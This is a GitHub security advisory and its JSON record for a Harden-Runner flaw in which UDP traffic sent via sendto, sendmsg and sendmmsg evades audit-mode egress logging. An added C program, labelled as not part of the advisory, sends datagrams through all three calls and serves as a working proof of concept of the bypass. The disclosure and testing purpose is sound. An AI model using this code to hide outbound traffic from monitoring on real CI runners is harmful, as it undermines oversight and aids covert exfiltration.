GHSA-CPMJ-H4F6-R6PQ

Vulnerability from github – Published: 2026-02-09 17:19 – Updated: 2026-02-09 22:39
Summary
Harden-Runner: Bypassing Logging of Outbound Connections Using sendto, sendmsg, and sendmmsg in Harden-Runner (Community Tier)
Details

Summary

A security vulnerability has been identified in the Harden-Runner GitHub Action (Community Tier) that allows outbound network connections to evade audit logging. Specifically, outbound traffic using the sendto, sendmsg, and sendmmsg socket system calls can bypass detection and logging when using egress-policy: audit.

Note: This vulnerability only affects audit mode. When using egress-policy: block, these connections are properly blocked. It requires the attacker to already have code execution within the GitHub Actions workflow (e.g., through workflow injection or a compromised dependency).

Affected Versions

  • Harden-Runner Community Tier: All versions prior to v2.14.2
  • Harden-Runner Enterprise Tier: NOT AFFECTED

Severity

Medium - This vulnerability affects audit logging capabilities but requires the attacker to already have code execution within the workflow.

Impact

When Harden-Runner is configured in audit mode (egress-policy: audit), attackers with the ability to execute arbitrary code in a workflow can:

  • Send outbound network traffic without generating audit logs
  • Bypass network monitoring for UDP-based communications

Important: This vulnerability requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies).

Technical Details

The vulnerability stems from incomplete monitoring coverage of certain socket-related system calls. Specifically, the following system calls can be used to send UDP traffic without triggering audit events:

  • sendto()
  • sendmsg()
  • sendmmsg()

An attacker with code execution in a workflow can compile and execute native code that uses these system calls to establish covert communication channels.
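The three send paths above, as an added example that is not part of the advisory or of Harden-Runner's own code: a small Linux C program that pushes one UDP datagram through each of sendto(), sendmsg() and sendmmsg(). Run with no arguments it performs an offline self-check against a loopback receiver; run as ./udp_probe HOST PORT inside a test workflow, against a host you control, it lets you compare which of the three sends appear in the egress audit log. The program name, the probe payloads and the locally declared mmsghdr layout are assumptions of this example, not details taken from the advisory.

```c
/* Added example, not Harden-Runner or advisory code. Sends one UDP datagram
 * through each of sendto(), sendmsg() and sendmmsg() so a reproduction run
 * can check which paths an egress monitor records. Linux only. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <unistd.h>

/* Kernel layout of struct mmsghdr (a msghdr followed by the per-message byte
 * count). Declared locally (assumption for this example) so the file compiles
 * no matter whether _GNU_SOURCE was set before <sys/socket.h>. */
struct probe_mmsghdr {
    struct msghdr msg_hdr;
    unsigned int msg_len;
};

/* Send one datagram to dst via each of the three paths.
 * Returns how many of the three calls reported success (0..3), or -1. */
int send_three_ways(struct sockaddr_in *dst)
{
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0)
        return -1;
    int ok = 0;

    /* 1. sendto(): the plain connectionless send */
    static const char m1[] = "probe-sendto";
    if (sendto(fd, m1, sizeof m1, 0, (struct sockaddr *)dst, sizeof *dst) == (ssize_t)sizeof m1)
        ok++;

    /* 2. sendmsg(): destination and payload carried in a msghdr */
    static const char m2[] = "probe-sendmsg";
    struct iovec iov2 = { .iov_base = (void *)m2, .iov_len = sizeof m2 };
    struct msghdr mh;
    memset(&mh, 0, sizeof mh);
    mh.msg_name = dst;
    mh.msg_namelen = sizeof *dst;
    mh.msg_iov = &iov2;
    mh.msg_iovlen = 1;
    if (sendmsg(fd, &mh, 0) == (ssize_t)sizeof m2)
        ok++;

    /* 3. sendmmsg(): batched send, one msghdr per datagram, issued as a raw
     *    syscall; the kernel fills msg_len with the bytes sent per message */
    static const char m3[] = "probe-sendmmsg";
    struct iovec iov3 = { .iov_base = (void *)m3, .iov_len = sizeof m3 };
    struct probe_mmsghdr mm[1];
    memset(mm, 0, sizeof mm);
    mm[0].msg_hdr.msg_name = dst;
    mm[0].msg_hdr.msg_namelen = sizeof *dst;
    mm[0].msg_hdr.msg_iov = &iov3;
    mm[0].msg_hdr.msg_iovlen = 1;
    if (syscall(SYS_sendmmsg, fd, mm, 1u, 0) == 1 && mm[0].msg_len == sizeof m3)
        ok++;

    close(fd);
    return ok;
}

/* Offline self-check: bind a UDP receiver on 127.0.0.1, send through all three
 * paths, and return the number of datagrams that arrive (3 when every path
 * works on this kernel). */
int loopback_probe(void)
{
    int rx = socket(AF_INET, SOCK_DGRAM, 0);
    if (rx < 0)
        return -1;
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0;                               /* kernel picks a free port */
    socklen_t alen = sizeof addr;
    if (bind(rx, (struct sockaddr *)&addr, alen) < 0 ||
        getsockname(rx, (struct sockaddr *)&addr, &alen) < 0) {
        close(rx);
        return -1;
    }
    struct timeval tv = { .tv_sec = 1, .tv_usec = 0 }; /* don't hang if a path fails */
    setsockopt(rx, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);

    int sent = send_three_ways(&addr);
    int received = 0;
    char buf[64];
    while (received < sent && recv(rx, buf, sizeof buf, 0) > 0)
        received++;
    close(rx);
    return received;
}

int main(int argc, char **argv)
{
    if (argc == 3) {                                 /* ./udp_probe HOST PORT */
        struct sockaddr_in dst;
        memset(&dst, 0, sizeof dst);
        dst.sin_family = AF_INET;
        dst.sin_port = htons((unsigned short)atoi(argv[2]));
        if (inet_pton(AF_INET, argv[1], &dst.sin_addr) != 1) {
            fprintf(stderr, "bad IPv4 address: %s\n", argv[1]);
            return 1;
        }
        printf("%d of 3 sends succeeded; compare against the egress audit log\n",
               send_three_ways(&dst));
        return 0;
    }
    printf("loopback self-check: %d of 3 datagrams received\n", loopback_probe());
    return 0;
}
```

Per the advisory, on an unpatched Community Tier runner in audit mode none of the three datagrams should show up in the log, while after upgrading to v2.14.2 all three should. Keeping a probe like this in a test workflow turns the fix into a regression check on the monitoring itself rather than a version number to trust.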

Affected Users

This vulnerability ONLY affects users of the Harden-Runner Community Tier.

The Harden-Runner Enterprise Tier is NOT vulnerable to this bypass technique.

Remediation

For Community Tier Users

Upgrade to Harden-Runner v2.14.2 or later. This version includes fixes for the logging bypass vulnerability.

For Enterprise Tier Users

No action required. Enterprise tier customers are not affected by this vulnerability.

Credit

We would like to thank Devansh Batham for responsibly disclosing this vulnerability through our security reporting process. Devansh was communicative throughout the process and verified the fix before it was made public.


{
  "affected": [
    {
      "package": {
        "ecosystem": "GitHub Actions",
        "name": "step-security/harden-runner"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.14.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25598"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-221",
      "CWE-778",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-09T17:19:14Z",
    "nvd_published_at": "2026-02-09T20:15:58Z",
    "severity": "MODERATE"
  },
  "details": "## Summary \n\nA security vulnerability has been identified in the Harden-Runner GitHub Action (Community Tier) that allows outbound network connections to evade audit logging. Specifically, outbound traffic using the `sendto`, `sendmsg`, and `sendmmsg` socket system calls can bypass detection and logging when using `egress-policy: audit`. \n\n**Note:** This vulnerability only affects audit mode. When using `egress-policy: block`, these connections are properly blocked. It requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies)\n\n## Affected Versions \n\n- Harden-Runner Community Tier: All versions prior to v2.14.2 \n- Harden-Runner Enterprise Tier: **NOT AFFECTED** \n\n## Severity \n\n**Medium** - This vulnerability affects audit logging capabilities but requires the attacker to already have code execution within the workflow. \n\n## Impact \n\nWhen Harden-Runner is configured in audit mode (`egress-policy: audit`), attackers with the ability to execute arbitrary code in a workflow can: \n- Send outbound network traffic without generating audit logs \n- Bypass network monitoring for UDP-based communications \n\n**Important:** This vulnerability requires the attacker to already have code execution capabilities within the GitHub Actions workflow (e.g., through workflow injection or compromised dependencies). \n\n## Technical Details \n\nThe vulnerability stems from incomplete monitoring coverage of certain socket-related system calls. Specifically, the following system calls can be used to send UDP traffic without triggering audit events: \n\n- `sendto()` \n\n- `sendmsg()` \n\n- `sendmmsg()` \n\nAn attacker with code execution in a workflow can compile and execute native code that uses these system calls to establish covert communication channels. \n\n## Affected Users \n\n**This vulnerability ONLY affects users of the Harden-Runner Community Tier.** \n\nThe Harden-Runner Enterprise Tier is **NOT vulnerable** to this bypass technique. \n\n## Remediation \n\n### For Community Tier Users \n \n**Upgrade to Harden-Runner v2.14.2 or later.** This version includes fixes for the logging bypass vulnerability. \n\n### For Enterprise Tier Users \n\nNo action required. Enterprise tier customers are not affected by this vulnerability. \n\n## Credit \n\nWe would like to thank [Devansh Batham](https://github.com/devanshbatham) for responsibly disclosing this vulnerability through our security reporting process. Devansh was communicative throughout the process and verified the fix before it was made public.",
  "id": "GHSA-cpmj-h4f6-r6pq",
  "modified": "2026-02-09T22:39:28Z",
  "published": "2026-02-09T17:19:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/step-security/harden-runner/security/advisories/GHSA-cpmj-h4f6-r6pq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25598"
    },
    {
      "type": "WEB",
      "url": "https://github.com/step-security/harden-runner/commit/5ef0c079ce82195b2a36a210272d6b661572d83e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/step-security/harden-runner"
    },
    {
      "type": "WEB",
      "url": "https://github.com/step-security/harden-runner/releases/tag/v2.14.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Harden-Runner: Bypassing Logging of Outbound Connections Using sendto, sendmsg, and sendmmsg in Harden-Runner (Community Tier)"
}

